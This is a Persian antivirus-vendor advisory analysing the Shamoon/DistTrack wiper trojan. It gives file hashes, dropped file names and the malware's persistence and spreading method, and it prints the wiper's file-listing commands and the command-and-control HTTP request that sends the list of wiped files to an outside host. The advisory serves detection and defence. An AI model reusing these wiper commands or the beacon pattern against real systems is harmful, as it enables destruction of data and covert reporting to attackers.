مراقب ویروس DistTrack یا Shamoon باشید !
28 مرداد، اطلاعات تکمیلی
بدافزار DistTrack از نوع بدافزارهای Trojan بوده و رفتار بسیار مخربی دارد. این بدافزار با رونویسی فایلها و بخش MBR و جایگزین کردن داده های آنها با داده های خراب، سبب از بین رفتن دائمی اطلاعات ذخیره شده بر روی دیسک می شود. W32/DistTrack برای اولین بار در مرداد ماه سال جاری (۱۳۹۱) مشاهده شد.
بدافزار DistTrack که اکنون توسط برخی شرکتهای ضدویروس Shamoon هم نامیده می شود، به احتمال قوی از طریق ایمیل و بصورت یک برنامه اجرایی مخفی شده در درون فایل پیوست (attachemnt) ایمیل، منتشر می گردد. به نظر می رسد که این برنامه اجرایی از یک نقطه ضعف ناشناخته برای نفوذ به سیستم قربانی سوء استفاده می کند.
با توجه به آمار آلودگی های گزارش شده، برخی شرکتهای ضدویروس اعتقاد دارند که هدف اصلی بدافزار DistTrack حوزه انرژی (نفت و گاز) است. از جمله، شرکت نفت عریستان سعودی (Aramco) مورد حمله این بدافزار قرار گرفته و طبق برخی اخبار غیرموثق، بخش های بزرگی از این شرکت نفتی دچار اختلال شده است و علاوه بر کامپیوتر پرسنل، سرورهای ایمیل و وب و همچنین Domain Controller مورد حمله و آسیب قرار گرفته اند.
برخی کارشناسان امنیتی این بدافزار را نسخه جدیدی از بدافزاری می دانند که در ایران به Wiper مشهور گردید و در نهایت منجر به کشف بدافزار Flame شد. از طرف دیگر، برخی اعتقاد دارند که بدافزار DistTrack یک بدافزار جدید و مستقل است که در ساخت آن فقط از Wiper الهام گرفته شده است.
27 مرداد، خبر اولیه
بدافزار DistTrack از نوع بدافزارهای Trojan بوده و رفتار بسیار مخربی دارد. این بدافزار با رونویسی فایلها و بخش MBR و جایگزین کردن داده های آنها با داده های خراب، سبب از بین رفتن دائمی اطلاعات ذخیره شده بر روی دیسک می شود. W32/DistTrack برای اولین بار در مرداد ماه سال جاری (۱۳۹۱) مشاهده شد.
نحوه انتشار اولیه این بدافزار هنوز مشخص نیست اما قابلیت انتشار از طریق Admin$ را دارا می باشد.
فایلهای اصلی مورد استفاده بدافزار DistTrack عبارتند از:
Filename : str.exe
Length : 989184 bytes
MD5 : B14299FD4D1CBFB4CC7486D978398214
SHA1 : 7C0DC6A8F4D2D762A07A523F19B7ACD2258F7ECC
Filename : str.exe
Length : 989,184 bytes
MD5 : D214C717A357FE3A455610B197C390AA
SHA1: 502920A97E01C2D022AC401601A311818F336542
This version does run however and results in the following files being dropped on the system.
Filename : netinit.exe
Length : 133120 bytes
MD5 : 41F13811FA2D4C41B8002BFB2554A286
SHA1 : C404CDC9F804B565D60B2ADB87C9A6B7AFB42B90
Filename : dfrag.exe
Length : 194048 bytes
MD5 : 3B740CCA401715985F3A0C28F851B60E
SHA1 : 5752898ABC85528D50739A1EDC8E6FEED0A3E1AD
Filename : drdisk.sys
Length : 27280 bytes
MD5 : 1493D342E7A36553C56B2ADEA150949E
SHA1 : CE549714A11BD43B52BE709581C6E144957136EC
ظاهراً فایلهای اجرایی این بدافزار در 19 مرداد ایجاد شده اند.
با اجرا شدن فایل اجرایی اولیه، بدافزار یک کپی از خود را با نام tsksvr.exe در مسیر %SystemRoot%\System32 قرار می دهد. در ادامه، این فایل تحت یک سرویس با مشخصاتی که در شکل زیر نمایش داده شده است اجرا و فایل اولیه حذف می گردد.
با شروع به کار سرویس ایجاد شده، هر دو دقیقه یکبار یک فایل اجرایی با یکی از نامهای زیر بر روی سیستم قربانی کپی می شود:
caclsrv.exe, certutl.exe, clean.exe, ctrl.exe, dfrag.exe, dnslookup.exe, dvdquery.exe, event.exe, findfile.exe, gpget.exe, ipsecure.exe, iissrv.exe, msinit.exe, ntfrsutil.exe, ntdsutl.exe, power.exe, rdsadmin.exe, regsys.exe, sigver.exe, routeman.exe, rrasrv.exe, sacses.exe, sfmsc.exe, smbinit.exe, wcscript.exe, ntnw.exe, netx.exe, fsutl.exe, extract.exe,
همچنین این ویروس دارای یک بخش Wiper است که وظیفه رونویسی فایلهای دیسک سخت، MBR و Boot Sector را عهده دار می باشد. این بخش فرامین زیر را اجرا می کند:
dir “C:\Documents and Settings\” /s /b /a:-D >nul | findstr -i download >nul >f1.inf
dir “C:\Documents and Settings\” /s /b /a:-D >nul | findstr -i document >nul >>f1.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i download >nul >>f1.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i document >nul >>f1.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i picture >nul >>f1.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i video >nul >>f1.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i music >nul >>f1.inf
dir “C:\Documents and Settings\” /s /b /a:-D >nul | findstr -i desktop >nul >f2.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i desktop >nul >>f2.inf
dir C:\Windows\System32\Drivers /s /b /a:-D >nul >>f2.inf
dir C:\Windows\System32\Config /s /b /a:-D >nul | findstr -v -i systemprofile >nul >>f2.inf
dir f1.inf /s /b >nul >>f1.inf
dir f2.inf /s /b >nul >>f1.inf
نتیجه اجرای این فرامین، تهیه فهرستی از نام و مسیر فایلهایی است که در شاخه های Desktop، Documents، Download، Video، Music، Pictures قرار دارند. این فهرست در دو فایل به نامهای f1.inf و f2.inf ذخیره می شوند. در ادامه، یک کپی از فهرست فایلها در فایل زیر ذخیره می شود:
C:\WINDOWS\inf\netfb318.pnf
سپس داده های این فایلها، با 1024 بایت اول یک فایل JPEG بطور مکرر جایگزین می شود. (تصویر زیر)
در این حالت، محتوای اصلی فایلها از بین رفته و غیرقابل برگشت می باشند.
همچنین بخش Wiper فایلی با نام drdisk.sys را بر روی سیستم آلوده کپی می کند که از آن برای رونویسی MBR و جداول پارتیشن دیسک استفاده می کند. داده هایی که برای رونویسی استفاده می شوند همانهایی هستند که در تصویر بالا نمایش داده شده است. این رونویسی سبب می گردد که دیسک بعد از راه اندازی مجدد دستگاه توسط سیستم غیرقابل شناسایی شود.
در نهایت این بدافزار فهرستی از فایلهای رونویسی شده را از C:\WINDOWS\inf\netfb318.pnf خوانده و اطلاعات را به مرکز فرماندهی (Command and Control) خود با مشخصات زیر ارسال می کند:
GET /ajax_modal/modal/data.asp?mydata=_1CD&uid=172.xxx.xxx.xxx&state=9323859
HTTP/1.1
Connection: keep-alive
User-Agent: you
Host: 10.1.252.19
Pragma: no-cache
به روز نگه داشتن ضدویروس و همچنین استفاده از تنظیمات توصیه شده توسط کارشناسان شرکت مهندسی شبکه گستر (مانند فعال سازی قاعده Prevent remote creation/modification of executable and configuration files) در نرم افزار ضدویروس می تواند کامپیوتر را در مقابل این ویروس محافظت کند.
ضدویروس های McAfee و Bitdefender به ترتیب این بدافزار را با نام های W32/DistTrack و Gen:Trojan.Heur.8u0@IlmUdSm و با به روز رسانی های DAT 6805 و Update 7.42746 قادر به شناسایی و پاکسازی این ویروس می باشند.
یک پاسخ
با سلام خسته نباشید از اینکه اخبار و هشدارهای مهم را به موقع و سریع در اختیار بازدید کنندگان می گذارید و یا از طریق ایمیل اطلاع رسانی می فرمایید واقعا” تشکر کرده و از ته قلب آرزوی موفقیت و پیروزی را برای شما دارم